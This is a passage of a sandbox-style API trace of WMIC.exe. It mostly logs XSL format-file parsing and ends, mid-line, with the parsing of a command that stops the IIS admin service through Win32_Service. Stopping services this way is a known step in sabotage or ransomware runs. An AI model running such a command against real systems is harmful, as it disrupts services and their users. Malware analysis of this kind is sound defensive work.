SysStringLen (param_1="HTABLE") returned 0x6 [0297.714] SysStringLen (param_1="CSV") returned 0x3 [0297.714] SysStringLen (param_1="HFORM") returned 0x5 [0297.714] malloc (_Size=0x18) returned 0x782d40 [0297.714] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.714] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.714] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.714] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=9, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.714] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="texttable.xsl") returned 0x0 [0297.714] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.715] malloc (_Size=0xc) returned 0x7897f0 [0297.715] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.715] free (_Block=0x7897f0) [0297.715] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0297.715] malloc (_Size=0xc) returned 0x7897f0 [0297.715] malloc (_Size=0xc) returned 0x78ad38 [0297.715] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.715] SysStringLen (param_1="TABLE") returned 0x5 [0297.715] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.715] SysStringLen (param_1="VALUE") returned 0x5 [0297.715] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.715] SysStringLen (param_1="XML") returned 0x3 [0297.715] SysStringLen (param_1="XML") returned 0x3 [0297.715] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.715] malloc (_Size=0x18) returned 0x782d60 [0297.715] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.715] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.716] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.716] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=10, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.716] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="texttable.xsl") returned 0x0 [0297.716] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.716] malloc (_Size=0xc) returned 0x78adb0 [0297.716] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.716] free (_Block=0x78adb0) [0297.716] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0297.716] malloc (_Size=0xc) returned 0x78ac18 [0297.716] malloc (_Size=0xc) returned 0x78ac48 [0297.716] SysStringLen (param_1="texttablewsys") returned 0xd [0297.716] SysStringLen (param_1="TABLE") returned 0x5 [0297.716] SysStringLen (param_1="texttablewsys") returned 0xd [0297.716] SysStringLen (param_1="XML") returned 0x3 [0297.717] SysStringLen (param_1="texttablewsys") returned 0xd [0297.717] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.717] SysStringLen (param_1="XML") returned 0x3 [0297.717] SysStringLen (param_1="texttablewsys") returned 0xd [0297.717] malloc (_Size=0x18) returned 0x782b60 [0297.717] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.717] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.717] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.717] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=11, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.717] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="texttable.xsl") returned 0x0 [0297.717] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.717] malloc (_Size=0xc) returned 0x78ab70 [0297.717] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.717] free (_Block=0x78ab70) [0297.718] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0297.718] malloc (_Size=0xc) returned 0x78ab70 [0297.718] malloc (_Size=0xc) returned 0x78ab28 [0297.718] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0297.719] SysStringLen (param_1="TABLE") returned 0x5 [0297.719] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0297.719] SysStringLen (param_1="XML") returned 0x3 [0297.719] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0297.719] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.720] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.720] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0297.720] malloc (_Size=0x18) returned 0x782ca0 [0297.720] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.720] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.720] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.720] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=12, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.720] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="texttable.xsl") returned 0x0 [0297.720] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.720] malloc (_Size=0xc) returned 0x78aca8 [0297.720] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.720] free (_Block=0x78aca8) [0297.721] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0297.721] malloc (_Size=0xc) returned 0x78ac78 [0297.721] malloc (_Size=0xc) returned 0x78ad98 [0297.721] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0297.721] SysStringLen (param_1="TABLE") returned 0x5 [0297.721] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0297.721] SysStringLen (param_1="XML") returned 0x3 [0297.721] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0297.721] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.721] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0297.721] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0297.721] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.721] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0297.721] malloc (_Size=0x18) returned 0x782a00 [0297.721] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.721] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.721] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.721] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=13, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.722] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="texttable.xsl") returned 0x0 [0297.722] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.722] malloc (_Size=0xc) returned 0x78ab40 [0297.722] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.722] free (_Block=0x78ab40) [0297.722] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0297.722] malloc (_Size=0xc) returned 0x78ac30 [0297.722] malloc (_Size=0xc) returned 0x78ab10 [0297.722] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0297.722] SysStringLen (param_1="TABLE") returned 0x5 [0297.722] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0297.722] SysStringLen (param_1="XML") returned 0x3 [0297.722] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0297.722] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.722] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0297.722] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0297.722] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0297.722] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0297.723] malloc (_Size=0x18) returned 0x7829a0 [0297.723] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.723] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.723] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.723] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=14, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.723] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="texttable.xsl") returned 0x0 [0297.723] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.723] malloc (_Size=0xc) returned 0x78ab58 [0297.723] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.723] free (_Block=0x78ab58) [0297.723] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0297.723] malloc (_Size=0xc) returned 0x78adc8 [0297.724] malloc (_Size=0xc) returned 0x78adf8 [0297.724] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0297.724] SysStringLen (param_1="TABLE") returned 0x5 [0297.724] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0297.724] SysStringLen (param_1="XML") returned 0x3 [0297.724] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0297.724] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.724] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0297.724] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0297.724] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0297.724] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0297.724] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0297.724] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0297.724] malloc (_Size=0x18) returned 0x7829c0 [0297.724] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.724] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.724] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.724] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=15, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.724] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="htable.xsl") returned 0x0 [0297.724] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.725] malloc (_Size=0xc) returned 0x78ac60 [0297.725] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.725] free (_Block=0x78ac60) [0297.725] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0297.725] malloc (_Size=0xc) returned 0x78ad68 [0297.725] malloc (_Size=0xc) returned 0x78abb8 [0297.725] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0297.725] SysStringLen (param_1="TABLE") returned 0x5 [0297.725] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0297.725] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.725] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0297.725] SysStringLen (param_1="XML") returned 0x3 [0297.725] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0297.725] SysStringLen (param_1="texttablewsys") returned 0xd [0297.725] SysStringLen (param_1="XML") returned 0x3 [0297.725] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0297.725] malloc (_Size=0x18) returned 0x782a40 [0297.726] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.726] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.726] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.726] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=16, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.726] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="htable.xsl") returned 0x0 [0297.726] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.726] malloc (_Size=0xc) returned 0x78acd8 [0297.726] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.726] free (_Block=0x78acd8) [0297.726] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0297.726] malloc (_Size=0xc) returned 0x78ad80 [0297.726] malloc (_Size=0xc) returned 0x78ac60 [0297.726] SysStringLen (param_1="htable-sortby") returned 0xd [0297.727] SysStringLen (param_1="TABLE") returned 0x5 [0297.727] SysStringLen (param_1="htable-sortby") returned 0xd [0297.727] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.727] SysStringLen (param_1="htable-sortby") returned 0xd [0297.727] SysStringLen (param_1="XML") returned 0x3 [0297.727] SysStringLen (param_1="htable-sortby") returned 0xd [0297.727] SysStringLen (param_1="texttablewsys") returned 0xd [0297.727] SysStringLen (param_1="htable-sortby") returned 0xd [0297.727] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0297.727] SysStringLen (param_1="XML") returned 0x3 [0297.727] SysStringLen (param_1="htable-sortby") returned 0xd [0297.727] malloc (_Size=0x18) returned 0x782a60 [0297.727] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.727] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.727] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.727] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=17, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.727] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="mof.xsl") returned 0x0 [0297.727] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.727] malloc (_Size=0xc) returned 0x78ab88 [0297.728] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.728] free (_Block=0x78ab88) [0297.728] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0297.728] malloc (_Size=0xc) returned 0x78abe8 [0297.728] malloc (_Size=0xc) returned 0x78ad50 [0297.728] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0297.728] SysStringLen (param_1="TABLE") returned 0x5 [0297.728] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0297.728] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.728] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0297.728] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0297.728] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0297.728] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0297.728] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.728] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0297.728] malloc (_Size=0x18) returned 0x782c60 [0297.728] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.728] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.729] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.729] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=18, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.729] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="mof.xsl") returned 0x0 [0297.729] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.729] malloc (_Size=0xc) returned 0x78adb0 [0297.729] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.729] free (_Block=0x78adb0) [0297.729] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0297.729] malloc (_Size=0xc) returned 0x78acd8 [0297.729] malloc (_Size=0xc) returned 0x78ab40 [0297.729] SysStringLen (param_1="wmiclimofformat") returned 0xf [0297.729] SysStringLen (param_1="TABLE") returned 0x5 [0297.729] SysStringLen (param_1="wmiclimofformat") returned 0xf [0297.729] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.730] SysStringLen (param_1="wmiclimofformat") returned 0xf [0297.730] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0297.730] SysStringLen (param_1="wmiclimofformat") returned 0xf [0297.730] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0297.730] SysStringLen (param_1="wmiclimofformat") returned 0xf [0297.730] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0297.730] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.730] SysStringLen (param_1="wmiclimofformat") returned 0xf [0297.730] malloc (_Size=0x18) returned 0x782b20 [0297.730] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.730] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.730] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.730] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=19, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.730] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="textvaluelist.xsl") returned 0x0 [0297.730] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.730] malloc (_Size=0xc) returned 0x78ade0 [0297.730] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.731] free (_Block=0x78ade0) [0297.731] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0297.731] malloc (_Size=0xc) returned 0x78aba0 [0297.731] malloc (_Size=0xc) returned 0x78ac90 [0297.731] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0297.731] SysStringLen (param_1="TABLE") returned 0x5 [0297.731] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0297.731] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.731] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0297.731] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0297.731] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0297.731] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0297.731] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0297.731] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0297.731] malloc (_Size=0x18) returned 0x782b80 [0297.731] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.731] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.731] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.732] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=20, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.732] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="textvaluelist.xsl") returned 0x0 [0297.732] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.732] malloc (_Size=0xc) returned 0x78ade0 [0297.732] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.732] free (_Block=0x78ade0) [0297.732] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0297.732] malloc (_Size=0xc) returned 0x78ab58 [0297.732] malloc (_Size=0xc) returned 0x78aca8 [0297.732] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0297.732] SysStringLen (param_1="TABLE") returned 0x5 [0297.732] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0297.732] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0297.732] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0297.732] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0297.732] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0297.733] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0297.733] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0297.733] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0297.733] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0297.733] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0297.733] malloc (_Size=0x18) returned 0x782bc0 [0297.733] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.733] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.733] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.733] IUnknown:Release (This=0x5a9ca0) returned 0x0 [0297.733] FreeThreadedDOMDocument:IUnknown:Release (This=0x5a6b48) returned 0x1 [0297.733] FreeThreadedDOMDocument:IUnknown:Release (This=0x5a45a8) returned 0x0 [0297.733] free (_Block=0x789988) [0297.734] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice" [0297.734] malloc (_Size=0xe0) returned 0x78aee8 [0297.734] memcpy_s (in: _Destination=0x78aee8, _DestinationSize=0xde, _Source=0x601b78, _SourceSize=0xd0 | out: _Destination=0x78aee8) returned 0x0 [0297.734] malloc (_Size=0xc) returned 0x78acc0 [0297.734] malloc (_Size=0xc) returned 0x78ab88 [0297.734] malloc (_Size=0xc) returned 0x78abd0 [0297.734] malloc (_Size=0xc) returned 0x78ad20 [0297.734] malloc (_Size=0x80) returned 0x78afd0 [0297.734] GetLocalTime (in: lpSystemTime=0x19f944 | out: lpSystemTime=0x19f944*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1d, wSecond=0x3, wMilliseconds=0x316)) [0297.734] _vsnwprintf (in: _Buffer=0x78afd0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x19f924 | out: _Buffer="04-02-2020T08:29:03") returned 19 [0297.734] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 69 [0297.734] malloc (_Size=0x8c) returned 0x78b058 [0297.734] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 69 [0297.734] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 69 [0297.734] malloc (_Size=0x8c) returned 0x78b0f0 [0297.734] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 69 [0297.734] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 69 [0297.734] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 69 [0297.735] malloc (_Size=0xa) returned 0x78acf0 [0297.735] lstrlenW (lpString="path") returned 4 [0297.735] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0297.735] malloc (_Size=0xa) returned 0x78ad08 [0297.735] malloc (_Size=0x4) returned 0x782ee8 [0297.735] free (_Block=0x0) [0297.735] free (_Block=0x78acf0) [0297.735] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 69 [0297.735] malloc (_Size=0x1c) returned 0x789da8 [0297.735] lstrlenW (lpString="Win32_Service") returned 13 [0297.735] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0297.735] malloc (_Size=0x1c) returned 0x780568 [0297.735] malloc (_Size=0x8) returned 0x780590 [0297.735] memmove_s (in: _Destination=0x780590, _DestinationSize=0x4, _Source=0x782ee8, _SourceSize=0x4 | out: _Destination=0x780590) returned 0x0 [0297.735] free (_Block=0x782ee8) [0297.735] free (_Block=0x0) [0297.735] free (_Block=0x789da8) [0297.735] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 69 [0297.735] malloc (_Size=0xc) returned 0x78adb0 [0297.735] lstrlenW (lpString="where") returned 5 [0297.735] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0297.735] malloc (_Size=0xc) returned 0x78ac00 [0297.735] malloc (_Size=0xc) returned 0x78acf0 [0297.735] memmove_s (in: _Destination=0x78acf0, _DestinationSize=0x8, _Source=0x780590, _SourceSize=0x8 | out: _Destination=0x78acf0) returned 0x0 [0297.735] free (_Block=0x780590) [0297.735] free (_Block=0x0) [0297.736] free (_Block=0x78adb0) [0297.736] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 69 [0297.736] malloc (_Size=0x36) returned 0x78b188 [0297.736] lstrlenW (lpString="\"name like '%%IISADMIN%%'\"") returned 26 [0297.736] _wcsicmp (_String1="\"name like '%%IISADMIN%%'\"", _String2="\"NULL\"") returned -20 [0297.736] lstrlenW (lpString="\"name like '%%IISADMIN%%'\"") returned 26 [0297.736] lstrlenW (lpString="\"name like '%%IISADMIN%%'\"") returned 26 [0297.736] malloc (_Size=0x36) returned 0x78b1c8 [0297.736] malloc (_Size=0x10) returned 0x78adb0 [0297.736] memmove_s (in: _Destination=0x78adb0, _DestinationSize=0xc, _Source=0x78acf0, _SourceSize=0xc | out: _Destination=0x78adb0) returned 0x0 [0297.736] free (_Block=0x78acf0) [0297.736] free (_Block=0x0) [0297.736] free (_Block=0x78b188) [0297.736] lstrlenW (lpString=" path Win32_Service where \"name like 